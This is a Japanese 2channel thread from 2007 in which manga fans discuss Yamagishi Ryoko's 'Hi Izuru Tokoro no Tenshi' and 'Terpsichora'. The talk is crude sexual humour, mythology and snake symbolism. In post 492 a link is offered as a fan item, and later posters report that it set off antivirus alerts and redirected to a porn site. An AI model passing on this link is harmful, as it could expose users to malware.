440 :花と名無しさん:2007/07/19(木) 00:10:25 ID:???O
>>438
利夫なのか?

441 :花と名無しさん:2007/07/19(木) 00:14:59 ID:???0
じゃあコブラは千花と六花か

442 :花と名無しさん:2007/07/19(木) 01:20:00 ID:???0
工エエェェ(´д`)ェェエエ工

443 :花と名無しさん:2007/07/19(木) 01:20:59 ID:???0
フ○チンの利夫はかんべんw

444 :花と名無しさん:2007/07/19(木) 01:38:06 ID:???0
>>439
「見ましたね」が「やりませんか」になるのか

445 :花と名無しさん:2007/07/19(木) 01:48:12 ID:???O
>>443
脂肪に埋もれてる?…

>>407
刀自古手縫いの松葉模様(だっけ?)の衣にたっぷり…

下品過ぎた…

446 :花と名無しさん:2007/07/19(木) 04:05:24 ID:???0
>>376
なぜか白鳥だったら絵になると思ったw

447 :花と名無しさん:2007/07/19(木) 06:04:32 ID:???O
白鳥おなぬー
王子のバックで美しく踊る茜ちゃん(三十二回転)

448 :花と名無しさん:2007/07/19(木) 08:08:00 ID:???0
これからはオナヌも背景に気を遣わないとね!

449 :花と名無しさん:2007/07/19(木) 08:13:07 ID:???0
刀自古が夢殿の押入れを開けたら、ふんどしの雪崩が・・・

450 :花と名無しさん:2007/07/19(木) 08:46:49 ID:???0
おまいら朝から何言ってんだww
確かに白鳥は水面では優美で冴え冴えと美しくまばゆい子だが
水面下では必死に足をかいて…

451 :花と名無しさん:2007/07/19(木) 08:50:52 ID:???O
>>449
王子のタダのだらしない厨坊な一面w

452 :花と名無しさん:2007/07/19(木) 09:06:41 ID:???0
そーそー
立つ鳥跡を濁さずなんて全くのウソだよ
水草を食い散らかして濁り放題
身繕いの羽は散らばってるし
ウ○コちゃんもふわふわ
綺麗な顔は表だけよ

誰かさんみたいダネw

453 :花と名無しさん:2007/07/19(木) 09:19:28 ID:???O
肉マンに段ボールが入ってるこんな世の中じゃ

454 :花と名無しさん:2007/07/19(木) 09:31:11 ID:???O
ポワゾン

455 :花と名無しさん:2007/07/19(木) 09:40:28 ID:???0
夢殿に押入れがあるのかw

456 :花と名無しさん:2007/07/19(木) 09:42:12 ID:h0Uab7PgO
香辛料のせいか結構旨かったらしいね、段ボール肉まん……

457 :花と名無しさん:2007/07/19(木) 09:43:26 ID:???0
>>453
ガセっつーか中国のTV局のやらせだったらしいよ。
朝のニュース番組でやってた。

458 :花と名無しさん:2007/07/19(木) 10:03:52 ID:???O
>>455
ほんとだ
違和感なかったから気づかなかった

459 :花と名無しさん:2007/07/19(木) 10:07:11 ID:???O
>>457
それも中国のテレビがソースだから
もはやどっちが本当なのかうやむやだな。

460 :花と名無しさん:2007/07/19(木) 10:22:11 ID:???0
夢殿自体が押入れみたいなもんだし

461 :花と名無しさん:2007/07/19(木) 10:41:47 ID:???0
あの国は新聞もテレビも全部、国の検閲が入るからねえ。
「ダンボール肉まんはやらせ」ということにするように言われたんだろ。

462 :花と名無しさん:2007/07/19(木) 11:03:26 ID:???0
例えやらせが事実にしたって、あの国なら
ダンボールを具にしかねないからなあ。

463 :花と名無しさん:2007/07/19(木) 11:38:04 ID:???O
鬼ウィズ斧イン押し入れ

464 :花と名無しさん:2007/07/19(木) 11:53:43 ID:???O
優雅なポーズの下でシコる姿…
まさに白鳥

465 :花と名無しさん:2007/07/19(木) 12:22:32 ID:???0
鬼といえば
飢饉の時には床に敷いていた筵を食べるとかあったよね
それならダンボールも喰えないことはないような
勿論食べたいとは思わないけど

466 :花と名無しさん:2007/07/19(木) 12:35:40 ID:???O
進んで食べるならいいけど
肉だと思ってたら段ボールってのはただの詐欺だろ
ゴミ混じりの木クズだよ?

467 :花と名無しさん:2007/07/19(木) 12:36:52 ID:???0
スレ違いな話題はこちらへ
http://human7.2ch.net/test/read.cgi/ms/1184283144/


468 :花と名無しさん:2007/07/19(木) 13:17:39 ID:???O
>>420
つパタリロのマライヒ。しかも公開オナヌー。

469 :花と名無しさん:2007/07/19(木) 13:19:31 ID:???O
おなぬ話でこれだけひっぱるとは……
こ このスレ住人は神なのか

470 :花と名無しさん:2007/07/19(木) 13:35:54 ID:???0
段ボールオナニーか

471 :花と名無しさん:2007/07/19(木) 13:52:47 ID:???O
ダンス板だかどこだかで言われていたけど、やっぱりテレプシ品薄みたい。
テレプシが賞を取った直後の時期には宣伝帯をつけて山積みにしていたTSUTAYAが近所にあって、
そこにならあると思って買いに行ったのだけど。
七巻がなくて。ほかの巻を買いながら在庫をきいたら
またかって感じで店員さん「注文しても全く入ってこないんです」だって。
私はコミックス貸したら返ってこなかったから買い直し組だけど、
初めて読む人が、続きを読みたいのに品切れだとかわいそうだなぁ。
いろんな本屋で困ってるのかね。
あ〜七巻どこかにないかなあ〜!

472 :花と名無しさん:2007/07/19(木) 13:56:52 ID:???0
つ密林

473 :花と名無しさん:2007/07/19(木) 14:00:25 ID:???0
ブコフに積んであった。

474 :花と名無しさん:2007/07/19(木) 14:08:49 ID:???O
>>420少女漫画に限定しなきゃ結構あるじゃろう
昔私が見たのは永井豪のなんかのコミクスだった
彼女を大事にしたいから理性を保つために
ムラッときたら抜くというちょっとイイ話
ITも見習うべきだな

475 :花と名無しさん:2007/07/19(木) 14:18:21 ID:???O
オナヌー話と聞いて、ターちゃんを全巻持ってる私が来ましたよ

476 :花と名無しさん:2007/07/19(木) 14:39:15 ID:h0Uab7PgO
女のオナヌなら山岸先生以外の漫画でも結構描かれてるの?
見たことないよ

477 :花と名無しさん:2007/07/19(木) 14:39:48 ID:???0
>465
それすぐ思い出したよ

478 :花と名無しさん:2007/07/19(木) 14:43:57 ID:???0
あんまりよく考えずスレもよく読まずに
>>420
女のオナニーはなかっただろう」
とレスしそうになってた。女じゃなかった。

479 :花と名無しさん:2007/07/19(木) 15:54:32 ID:???O
>>476
女のオナヌならなんて書いてないよ。

480 :花と名無しさん:2007/07/19(木) 16:29:43 ID:???O
>>437

   〇
\_/L

481 :花と名無しさん:2007/07/19(木) 16:31:19 ID:???0
>>480
肝心のコブラがねーじゃねーかw

482 :花と名無しさん:2007/07/19(木) 16:31:56 ID:???O
ズレタ

    〇
\_/

483 :花と名無しさん:2007/07/19(木) 16:35:18 ID:???0
>>418>>421
男やホモじゃなくて、腐女子の業じゃないの?
コブラは実はク・・

484 :花と名無しさん:2007/07/19(木) 16:39:30 ID:???0
>>476
最近の少女マンガでは結構描かれてるみたい。
朝倉ジョージであったよ。

485 :花と名無しさん:2007/07/19(木) 16:57:06 ID:???0
>>482
じゃあこんなんで

  シャー
   。  。シャー
   ∫ ∫
    〇
\_/

486 :花と名無しさん:2007/07/19(木) 17:31:05 ID:???O
>>485
こんなポーズ、王子が本当にしていたような。
…あれは床オナだったのか。

487 :花と名無しさん:2007/07/19(木) 17:43:18 ID:???O
大地とセックスしてたんだよ

488 :花と名無しさん:2007/07/19(木) 18:24:46 ID:D0BqgrmiO
>>487
六花がか?!
なんちて。

489 :花と名無しさん:2007/07/19(木) 18:59:26 ID:???O
>>481
肝心のって
そんなにもコブラは大事なんだな

490 :花と名無しさん:2007/07/19(木) 19:05:37 ID:???0
コブラのない…オナニーは
する価値がない…?


Kill

491 :花と名無しさん:2007/07/19(木) 19:44:25 ID:???0
マダヤテナイコハ?

492 :花と名無しさん:2007/07/19(木) 19:44:31 ID:???0
ttp://chinesefreewebs.com/ytamorir/index.htm
さすがに買う気が起きなかったんだけど、今にして思えば
買っておけば良かった…

493 :花と名無しさん:2007/07/19(木) 20:19:41 ID:???O
>>490
思い詰めないで!!

494 :花と名無しさん:2007/07/19(木) 20:27:24 ID:???O
>>449
こたつぶとんで簀巻きにされた、毒盛り女の遺体も

495 :花と名無しさん:2007/07/19(木) 20:27:32 ID:???0
>>482
ガンバって作ってくれたのか!ww
最初正座してPCしてる人?とオモタw
反り気味の脚と頭がイイ感じじゃないか
>>485でコブラ2匹が参加してもはや完璧のAA

496 :花と名無しさん:2007/07/19(木) 20:36:15 ID:???0
>>482
ああ、昔本屋で立ち読みしてたら
高校生くらいの男の子がエロ本手に持って、
まさしくこのポーズで突然上下運動始めた嫌な記憶が蘇った…orz

あれも一種の痴漢だったのかなぁ
それともホンモノの変態予備軍だったのか

497 :sage:2007/07/19(木) 20:56:46 ID:???0
     *'``・* 。
        |     `*。
       ,。∩      *    もうどうにでもな〜れ
      + (´・ω・`) *。+゚
      `*。 ヽ、  つ *゚*
       `・+。*・' ゚⊃ +゚
       ☆   ∪~ 。*゚
        `・+。*・ ゚

498 :花と名無しさん:2007/07/19(木) 21:20:00 ID:???0
もうコブラはいいよ・・・w

499 :花と名無しさん:2007/07/19(木) 21:39:31 ID:???O
>>482
二重関節!

500 :花と名無しさん:2007/07/19(木) 21:40:53 ID:???0
コブラたちの戦いはまだまだだぜ!

501 :花と名無しさん:2007/07/19(木) 21:44:20 ID:???0
コブラ! コブラ! コブラ! コブラ!

502 :花と名無しさん:2007/07/19(木) 21:52:51 ID:???0
オージ自重しる

503 :花と名無しさん:2007/07/19(木) 22:27:33 ID:???0
「セイレーン」にもオナヌをほのめかすシーンがあったような

504 :花と名無しさん:2007/07/19(木) 23:57:27 ID:???O
コブラなしのオナニーなんて

505 :花と名無しさん:2007/07/20(金) 00:01:27 ID:???0
オナヌより、王子が聖童子でなくなった夜
毛人としたであろう、あんなことやこんなことの
様子をくわしく見たい

506 :花と名無しさん:2007/07/20(金) 00:04:40 ID:???0
ああ、あったあった「セイレーン」でやってた。
「時じくの」でも日影がやってたし、ウケモチの神のあれも。
けっこうあるね、オナニー描写。

507 :素朴な疑問:2007/07/20(金) 00:05:03 ID:???0
SEX=不潔信仰はどこから来たんだろうか?
みんな、その不潔から生まれたのになぁ。

508 :花と名無しさん:2007/07/20(金) 00:14:53 ID:???0
快楽と罪悪感はセットで感じるようになっているのです。

509 :花と名無しさん:2007/07/20(金) 00:19:23 ID:???O
下の方は不浄な感じじゃん。
男の性器なんて小便するところと兼ねてるし。
女の方は大と小の間だけどね。

510 :花と名無しさん:2007/07/20(金) 00:23:59 ID:???O
女も月経があるしなあ……。

511 :花と名無しさん:2007/07/20(金) 01:08:43 ID:???0
古事記ではおおらかにセクロスシーンまであるのに…

512 :花と名無しさん:2007/07/20(金) 01:26:32 ID:???O
セックスつか女の性を汚れとするのは仏教伝来以降。古来は崇拝するものだった。土偶とか。
というのはよく聞く話だよな。キリスト教もオナーニ禁止だし。結局宗教か。
王子の女嫌いが母親に起因するのは間違いないが、仏教の影響も少しはあったのかな。

513 :花と名無しさん:2007/07/20(金) 01:31:03 ID:???O
巫女は処女じゃなくてはならない辺り、神道もあまり変わらない気がする。

性的なことイクナイ!な空気は明治維新以降だとは思うけどね。

514 :花と名無しさん:2007/07/20(金) 01:34:09 ID:???0
古事記ではまぐわいまっせ〜なのにね。
王子は潔癖症ということもあるのかな。

515 :花と名無しさん:2007/07/20(金) 01:35:42 ID:???0
日本人は元々セックスにおおらかだったのでは。
キリスト教の思想が入ってきてから、
性に対する慎みを持つのがよいとされてきたような。

10年くらい前に「フランシスコ・ザビエル展」を見たときに、
ザビエルがお国に宛てた手紙の実物と和訳文が展示されていたんだけど、
そりゃあザビエルさんが嘆きたくなるような内容でしたよ。
『女は人目も憚らずそこいらへんで小便をし、
男女は昼間っから畑仕事の合間にマグワっている。
こんな人々にキリスト教を理解させるなんて、無理!』
という内容でした。

516 :花と名無しさん:2007/07/20(金) 01:41:20 ID:???O
おおらかと言ってもなぁ。
古事記にはマンコを「陰(ホト)」と言って暗く伝えているし、
オホゲツヒメがスサノヲに尻や鼻や口から食べ物を取り出すのを、スサノヲは「穢らわしい」と言って切って捨てるシーンもあるし
(このシーン、ギシの月読ではウケモチノカミとツクヨミに改変されてるけど)
マグハイ(セックス)と穢れは非常に近いところにあると匂わせているよ。


ただ、西洋的な「隠すべきもの」という価値観ではないと思うけど。

517 :花と名無しさん:2007/07/20(金) 01:42:52 ID:???0
>>515
江戸時代まではフリーセックスだったんだよね。
だから明治時代に厳格さを受け入れたことが奇跡。
今は昔に戻っただけ。(大昔よりは今の方がまだ厳格)

518 :花と名無しさん:2007/07/20(金) 01:53:11 ID:???O
>>516
男女ともに性器は日本の原始宗教と結び付いてるしね。とくに女性は。
良かれあしかれ、力が吉と出るか凶とでるか曖昧なものだったんじゃないかな。
どうでもいいが中国の陰陽思想でも男は陽、女は陰だよ。
ただしどっちがいいという問題じゃない。要はバランス。偏るとまた問題なんだ。

519 :花と名無しさん:2007/07/20(金) 01:58:32 ID:???0
>>492
少女漫画板だからと安心してリンク先に飛んだら
アンチウイルスが真っ赤になって怒りおった。
複数のウイルス検出だってさ。

こんなの踏むの私だけかもしれんが、みんな注意してちょ。

520 :花と名無しさん:2007/07/20(金) 01:59:47 ID:???0
リンクアドレスが不気味だから無視してた。

521 :花と名無しさん:2007/07/20(金) 02:04:05 ID:???O
あと、子供はホトから血で穢れて産まれてくるから、お湯ですすいで禊ぎをしなければ、みたいなところもある。
要はセックスや性器は不潔になりやすいけど、ウンコやしっこみたいに人間の生理として不思議な事じゃないから隠すまでもない
って言うのが日本の価値観。(もしかしたらアジア全体かも?)



西洋だと汚いものは隠さなきゃって事になっちゃうんだよね。

522 :花と名無しさん:2007/07/20(金) 02:37:22 ID:???O
性について語りだすと切りがないよ…
史学医学文学宗教それぞれの国のそれぞれの文化そして自分語り
そろそろ…

523 :花と名無しさん:2007/07/20(金) 02:42:05 ID:???O
じゃあコブラについて再開しましょうか。

524 :花と名無しさん:2007/07/20(金) 03:02:19 ID:???0
>>516
「古事記」だの「日本書紀」ができたころは、もう大和朝廷だったわけでしょ。
フェミのつもりじゃないけど、男性支配社会で女性蔑視は当たり前。
古代といっても、素朴な時代ではない。

525 :花と名無しさん:2007/07/20(金) 03:13:02 ID:???0
コブラ! コブラ! コブラ! コブラ!

526 :花と名無しさん:2007/07/20(金) 03:31:27 ID:???0
>>516 ヘミ思想にだいぶ毒されてる気がする。

だって、「おおらかに性を楽しんだ」といえば聞こえがいいけど、
ろくな避妊もなしにセックスしたら子供できるよ。

童貞の妄想やヘミ思想なら、「古代は性はおおらかだった」と称して
あっちの女、こっちの女に出して、出して、出しまくれる妄想したあげく、
「昔はよかった。今は糞」で幸せかもしれんが。

昔だろうが、今だろうが、
女にとって、出産・育児は大問題であることに変わりじゃない?

そもそも、そういう大問題を避けて、
「恋愛」という性も絡んだ心的状況を特化するため、
少女漫画における男×男表現は生まれたんだと思うけどね。

527 :花と名無しさん:2007/07/20(金) 03:40:23 ID:???0
農耕民族にとって子宝は豊穣と同義なのれす

528 :花と名無しさん:2007/07/20(金) 03:54:18 ID:???0
>>522の読まなかったことにされっぷりに泣いた

529 :花と名無しさん:2007/07/20(金) 04:09:54 ID:???O
コブラと言えば、蛇比礼でも、コブラに飲みこまれて、
「このカンジ…快感。」とか言ってなかった?
先生は、コブラを、性的で、かつ生々しくグロいものとして取らえてんのかな?

530 :花と名無しさん:2007/07/20(金) 05:27:25 ID:???0
そもそもヘビは性的なイメージとしてよく使われない?
(アダムとイブを唆したことに由来するのかな??)
コブラはそのより強いイメージだろうか?

531 :花と名無しさん:2007/07/20(金) 05:44:05 ID:???0
いやさ、神話に女性蔑視が出てるのよ。
イザナミから誘ってまぐわったから不具のヒルコが生まれたって。
次にイザナギから誘ったらちゃんとした子供ができた。
(でも国生みもしてるし、イザナギだけで三貴子生んだし、
神様ってよくわかんねw)

532 :花と名無しさん:2007/07/20(金) 08:31:20 ID:???O
>>529
ヴァギナの象徴になってるよね。
便利だな蛇。外見は男性器カパッと口あけたら女性器。

ちょっとズレるけど女性器と母性の象徴らしき
ナメクジおばさん(妖精王)を思い出した

533 :花と名無しさん:2007/07/20(金) 08:57:33 ID:???0
>>531
>>524を読んでよw
記紀が成立した時代は8世紀初め。
大和時代から奈良時代へ移った時期で
神話の名残もあるけど、編纂した側の思惑もたくさん盛り込まれてるのよ。
中国や朝鮮から色んな思想も入ってきてるしね。
中央から遠い地方では、母系社会だったかもしれんが。

534 :花と名無しさん:2007/07/20(金) 09:03:28 ID:???O
ホトホト

って足音どっかで使ってたよね
現代語にすると

マソコマソコ

535 :花と名無しさん:2007/07/20(金) 09:25:53 ID:???O
>>533
まあそういうのを含めて神話は面白いものだと思うしね。
古事記なんてアマテラスの系譜=天皇家の正当性を必死に伝えてるし
日本書紀になるともっと露骨。


でもこういう事は聖書やリグヴェーダにもあるし、そういう見方をすればまた違ったものが見えてくるかもよ。


古事記のルーツを探すと面白いよ。
大陸だけでなく、東南アジアやポリネシアからも影響されているのがわかる。

536 :花と名無しさん:2007/07/20(金) 10:03:43 ID:???0
>>530
コブラは確かに性的な感じもするね
ただ王子のコブラはフツへの憎しみがメラメラと頭をもたげ、
殺意を明確にした象徴じゃない?
今までは、自分の策略でフツを毛人の手の届かない所へ送り込めば
そのうち毛もあきらめると思ってた
しかしフツが大王の所で苦しんでることを知っただけで
すっかり自分のことを忘れ去り
フツへの想いをよりいっそう強く再燃させる毛人を目の当たりにしては…

「もう殺るしかない!」
と、毒殺のことを考えたのかも。。実際トリカブトをフツに食らわせようとしたし
そこで毒蛇にしたんだろうと思う(既出だろうが)
毒蛇といってもマムシとかだとはっきりしないから
コブラにしたのかねえ…(私はコブラ見るとクレオパトラ思い出すよ)

しかしコブラの次のページの王子はかわいそうで、色っぽくて、綺麗だよね
反乱の時フツを刺そうとしてた所を毛に見つかりすべてバレた後の
王子の涙とか、「私は毛人を失った」「なにもかも」
の所の王子の顔がかわいくてかわいそうですべて許したくなる
おっそろしい事イッパイやらかしてるんだけどね。。。ギシ先生すごいよ


537 :花と名無しさん:2007/07/20(金) 10:13:46 ID:???0
ケミシをゲットする為にフッツーに対する妨害をあの手この手で
繰り出し、恐ろしいことばかりする王子なんだけど、一途でなんか
かわいそうになる。

関係ないけれど、トジコって書くとドジッコみたいに見えるw

538 :花と名無しさん:2007/07/20(金) 10:50:19 ID:???O
>>536
でも本当、なんで青大将やハブじゃなくてコブラなんだろう。
そこが全くもってわからん。

539 :花と名無しさん:2007/07/20(金) 11:03:19 ID:???O
>>538
なんでわかんないんだよ!
コブラが一番最強で絵ヅラもインパクトあるじゃん!

540 :花と名無しさん:2007/07/20(金) 11:08:35 ID:???O
>>539
青大将も結構インパクトあるよ…ヤマタノオロチのモデルだし。

仏教伝来と並行してその辺のイメージなのかしら。
インドにコブラがいたのかよくわからないけど。

541 :花と名無しさん:2007/07/20(金) 11:13:28 ID:???0
コブラじゃなくてブラックマンバでもいいのにな…とかおもうけれど。
蛇は嫌いな人には耐えられないかもしれないけれど、芸術品美術品等の
モチーフになる事も多いし、美しい生物だからかな?と思っている。
コブラはその中でも非常に強いというか、王者という印象があるからかなぁ?

542 :花と名無しさん:2007/07/20(金) 11:59:50 ID:???0
あーインドをイメージすると仏教と結びついてくるね
壺に入ったコブラを笛を吹いて踊らせるwのってインド?イスラム圏?

コブラでググッたら「世界最強の毒蛇は?」みたいなスレにとんで、
ざっと見ただけだが色んな毒蛇について語られていた…
熱く語る住人達だが、
「キングコブラは華があるという点で一番」
という意見には賛同が多かったもよう。
やっぱ「華」か?
王子に似合うへびたん…

543 :花と名無しさん:2007/07/20(金) 12:00:09 ID:???0
でも蛇ってわりと神秘的と言うか神聖感があるよね。

むしろ俗っぽさと出すのにはコブラが最適だったのかも。
よく芸もするし。

544 :花と名無しさん:2007/07/20(金) 12:06:40 ID:???0
やっぱ仏教的な影響もあるんじゃ<コブラ
クジャクとかゾウとか色んな物が見た事もないのに入ってくるんだし

コブラオナヌーで気になったのはズボンどこにいつの間に脱いだの?だ。
引きこもって何故だって泣いている時点でもう脱いでるよね…<王子

545 :花と名無しさん:2007/07/20(金) 12:11:08 ID:???O
オナヌ関連の話題をいまだに続けてるスレ住人にちょっと感心した

どこまで行くんだお前ら……

546 :花と名無しさん:2007/07/20(金) 12:29:44 ID:???0
>>519
私も踏んじゃったよ。
でもウィルスじゃなくて、海外のエロサイトに飛ばされたorz

>>534
確か、最初の方で刀自古が毛人を起こしに行くシーンで
扉を開けた時の音だったと思う。

547 :花と名無しさん:2007/07/20(金) 13:07:01 ID:???O
>>532
> 便利だな蛇。外見は男性器カパッと口あけたら女性器。
なるほどー。だから性的な象徴なのか。
あと蛇のヌルヌル感とか、自分より大きいものを容易に飲み込む感じに、
心理的な嫌悪感や恐さを感じるね。


548 :花と名無しさん:2007/07/20(金) 13:07:09 ID:???0
古文でノック音を「ほとほと」と表現するのはありふれてる
言われてみりゃ、そっちの陰に音が通じるな。出入りするから?

549 :花と名無しさん:2007/07/20(金) 13:26:47 ID:???0
>>548
http://www005.upp.so-net.ne.jp/kenji99/b046.htm

ここに「ホ」=反復のオノマトペとして、陰(ホト)=反復する出生と
ホトホトと戸を叩く=何度も扉を叩くの擬態語とある。

日本語は音に言霊があるから面白いね。

550 :花と名無しさん:2007/07/20(金) 14:11:39 ID:???0
フツを殺そうとする王子の嫉妬は、まんま女の嫉妬だ。
実際の男と男のゲイの嫉妬とは違うよね。

551 :花と名無しさん:2007/07/20(金) 14:13:24 ID:???O
>>549
わかっちょると思うけど日本語以外だって言語はすべて思いがこもってるんじゃよ

552 :花と名無しさん:2007/07/20(金) 14:13:59 ID:???0
Photoshop : ホトショ : 女陰処

553 :花と名無しさん:2007/07/20(金) 14:21:10 ID:???0
>>551
それはわかってるけど、日本語は特に「音」に思いがこもってる言語だよ。
中国だと文字に魂が入ってるとか言われてる(現在進行形)。
ラテン語系も音かな?エジプトの象形文字は文字系だね。


それで、今まで文字を持たない言語だった日本語に
中国から来た漢字を宛てる時にかなり大きなパラダイムシフトがあったという話。
「言霊」がモノに吸着すると恐れられていた。

だから、日本語の「音」は大体調べていくと無意味なものはないんだよ。

554 :花と名無しさん:2007/07/20(金) 15:03:10 ID:???0
「キエーーーッ」とかも思いがこもってるね

555 :花と名無しさん:2007/07/20(金) 15:05:56 ID:???0
オシシ仮面の「グエーッ」もね
ttp://www.geocities.co.jp/Playtown-Bingo/6131/oshishi.jpg

556 :花と名無しさん:2007/07/20(金) 15:20:19 ID:???0
>>546
調子麻呂が「すんません」て扉を叩くときもそうだったかも

557 :花と名無しさん:2007/07/20(金) 15:28:07 ID:???0
このスレ住人は本当にオシシ仮面が好きだなw

558 :花と名無しさん:2007/07/20(金) 15:55:16 ID:???O
オシシ仮面て何

559 :花と名無しさん:2007/07/20(金) 15:56:03 ID:???0
        ,.-─ ─-、─-、
      , イ)ィ -─ ──- 、ミヽ
      ノ /,.-‐'"´ `ヾj ii /  Λ
    ,イ// ^ヽj(二フ'"´ ̄`ヾ、ノイ{
   ノ/,/ミ三ニヲ´        ゙、ノi!
  {V /ミ三二,イ , -─        Yソ
  レ'/三二彡イ  .:ィこラ   ;:こラ  j{
  V;;;::. ;ヲヾ!V    ー '′ i ー ' ソ
   Vニミ( 入 、      r  j  ,′
   ヾミ、`ゝ  ` ー--‐'ゞニ<‐-イ
     ヽ ヽ     -''ニニ‐  /
        |  `、     ⌒  ,/
       |    > ---- r‐'´
      ヽ_         |
         ヽ _ _ 」

     ググレカス [ gugurecus ]
   (西暦一世紀前半〜没年不明)

560 :花と名無しさん:2007/07/20(金) 16:24:03 ID:???O
☆バレエを題材にした漫画を語ろう4☆
http://hobby9.2ch.net/test/read.cgi/dance/1076089083/
このスレに出てくる「ユニコーンの恋人のどっかで見たことあるシーン」、って
山岸凉子の作品のことじゃない?

561 :花と名無しさん:2007/07/20(金) 17:34:40 ID:???0
>>516 遅レスですが

 古事記:スサノオがオオゲツヒメを殺害
日本書紀:ツクヨミがウケモチを殺害

なので、改変ではないと思う。

Wikipedia-「日本神話における食物起源神話」
ttp://ja.wikipedia.org/wiki/%E6%97%A5%E6%9C%AC%E7%A5%9E%E8%A9%B1%E3%81%AB%E3%81%8A%E3%81%91%E3%82%8B%E9%A3%9F%E7%89%A9%E8%B5%B7%E6%BA%90%E7%A5%9E%E8%A9%B1

テレプシ第二部早く読みたいけど、冬以降になるのかな・・・
アラベスクの第一部と第二部って、どれくらい間隔あったんだろう・・・

562 :花と名無しさん:2007/07/20(金) 17:49:03 ID:???O
>>561
へ〜そうなのか。
古事記の方しか読んだことないから知らなかった。
じゃあギシは日本書紀の方で描いたのか。

古事記と日本書紀って意外と微妙なところで違いがあるんだよね。おもしろいね。

ありがとう。

563 :花と名無しさん:2007/07/20(金) 21:20:27 ID:???0
      (ヽ、 _ヽ、  )\     ヽヽ
     _ヽ、     ⌒  ヽ、     \\
     \ ̄     __    )ノ     ヽヽ
    ∠⌒     / )    ⌒ヽ     | |
     )   / ̄゛- く       \   ノノ
    /  /ノ^)___)ノl       ヽ_//
   /   //(/ !_|_|       ヽ三ヽ
   レヘ  |j(/l_/    |ノヽ      |──)
    ノ (/l_/  /⌒| | | |  !   |二 二ヽ
  /   |_/__| |  | -| | ノノ    ノ── 、)
  /    `───| | ノ -| |   |/(())   ヽ
 /⌒) ∧    ヽ/_//  /j()ノ_   (()) i
    // ノ     |_// / ̄ ̄`\ (())  j
      (ヘ       ̄   |   ヽ   \   /
       )/(/) / ⌒ |⌒ヽ |\  /i\ /|   )ヽ
            |/      |    !  / | ノ |  ( (
     )ヽ           |  /  /  ( ((|   ) ヽ
    (  )           |  / /    ヽ|  (   )
    ) (      、    /  ) |ヽ、_ __ ノ   )  (
   (   ヽ    ((   /  /−、|        (   ヽ
(    )   )    )ヽ  ヽ_ノ |  |   ヽ   ノ     )
 )  (    (   ノ  )     |   |  ( (  (      (
 (_ ノ     )(  ( (    / /^)  ) )  )
               )  / / /  (  ( _ノ
                 (/__/   )



564 :花と名無しさん:2007/07/20(金) 22:17:56 ID:???0
流れぶった切って申し訳ない


パイドパイパーって
やたら具体的にT県やらS川とか出てくるけど
モデルになった事件があるのでしょうか?

ギシさんのまんがは
結構いろいろもとがありそうなのがおおいですよね。

565 :花と名無しさん:2007/07/20(金) 22:18:15 ID:???O
結局オシシ仮面がなんなのかわからない

566 :花と名無しさん:2007/07/20(金) 22:20:04 ID:???0
564です。

パイドパイパーのおっさんが、
さげまんって2回もいっててウケタw



567 :花と名無しさん:2007/07/20(金) 22:21:56 ID:???O
>>565
いんだよ細けえ事は

568 :花と名無しさん:2007/07/20(金) 22:33:19 ID:???0
>>566
主人公がそのおっさん(夫)に敬語つかってるんだよね。
なんか違和感ある・・・
昔風の夫婦みたい。

569 :花と名無しさん:2007/07/20(金) 22:40:57 ID:???0
>>564
宮崎勤では。

570 :花と名無しさん:2007/07/20(金) 22:57:33 ID:???0
テレプシ読み返してたら六花ちゃん達ゆとり世代だったのかと気づいた。
でもソックスがルーズソックス全盛期じゃなくて良かった。
千花のルーズソックスとか見たくないしw

571 :花と名無しさん:2007/07/20(金) 23:09:21 ID:???0
>>567
千花ちゃん乙

572 :花と名無しさん:2007/07/20(金) 23:18:09 ID:???O
大人気のオシシ仮面なのに何年経ってもちっともドラマにも映画にもならない…
実写化しても「イメージが違う!」とかは
ファンに言われないだろうに

573 :花と名無しさん:2007/07/21(土) 01:01:53 ID:???O
>>570
〉ルーズソックス全盛期じゃなくて良かった。
連載が長くなり、後で視覚的に古さを感じないように、
あまりにも流行的でインパクトのあるものを入れなかったのでは?
ガラスの仮面の美内すずえも、
「流行はなるべく入れないように気をつけたけど、漫画はやはり限界がありますね、絵になるから。
特に電話とかの電化製品は…昔は黒電話、今は携帯でしょ。」とコメントしてた。
長く漫画家やってる方はそこらへん経験してるから。
ギシ先生は一回だけ未来SFもの(昔っぽい宇宙服着てる人物が出てくる。今見ると古い。)に挑戦し、
お倉入りになった(後で途中まで掲載された)作品があるけど、
「未来物は古くなる。このジャンルにいかなくてよかった」と後でコメントされてました。
それに千花のキャラからして、履かなそうだねw


574 :花と名無しさん:2007/07/21(土) 01:06:27 ID:???0
>「未来物は古くなる。このジャンルにいかなくてよかった」

モー様に喧嘩売っry

575 :花と名無しさん:2007/07/21(土) 01:07:06 ID:???O
そういえば昔ガングロ漫画もあったなー
90年代前半は前髪がトサカみたいで眉毛太かったり。
当時は流行最先端でも、あまりに流行取り入れすぎてると、
時代がたつと恥ずかしくて見てられないんだよね。


576 :花と名無しさん:2007/07/21(土) 01:11:13 ID:???O
>>574
> モー様に喧嘩売っry
違うんだよ、モー様みたいな「胃世界ちっくな未来」じゃなくて、
その作品ってのがなんてゆーか……
絵で見せたいくらいなんだけど、ほんと「当時に想像して流行してた未来図」なのさ。
妙に宇宙船(というかジェット?)や服が角ばってたり。

577 :花と名無しさん:2007/07/21(土) 01:12:19 ID:???O
>>574
そんなつもりはないだろ。
実際に未来モノ描いて古さを感じさせないのは
萩尾と佐藤史生くらいだし。
一部の例外を除いて難しいのは事実だと思う。

578 :花と名無しさん:2007/07/21(土) 01:13:26 ID:???O
微妙にガンダムのアムロをダサくした服装だったかも

579 :花と名無しさん:2007/07/21(土) 01:19:00 ID:???O
>>577
たしかに未来物で古さを感じさせないのは、
ギシ先生のお友達のそのお二人くらいかも…

580 :花と名無しさん:2007/07/21(土) 01:19:05 ID:???0
>>573
むしろ発表字にちょっと時代遅れに感じるような漫画の方が
後々残りやすいとも言えるかも。寄生獣とかさ。

通信手段の発達をさり気無く組み込むのが上手だったのは
高口里純あたりかな。
ようは様式美化するのが上手なんだね。

ギシ先生も様式美化はメチャうまだなぁ。

581 :花と名無しさん:2007/07/21(土) 01:21:02 ID:???0
>>577
少女漫画じゃないけど
諸星大二郎の生物都市も入れてくれ。

582 :花と名無しさん:2007/07/21(土) 01:27:58 ID:???O
>>581
諸星さん読んだことない。
やっぱり古さを感じさせないのは、
流行を取り入れすぎないこと、なんじゃないかな。
モー様の未来は、流行だけをやみくもに取り入れているのではなく、
どこか懐かしさ(外国の昔)を取り入れていたりするから、
かえって古さを感じさせない。


583 :花と名無しさん:2007/07/21(土) 01:30:00 ID:???O
>>581
ワシはまだまだ生きられる…

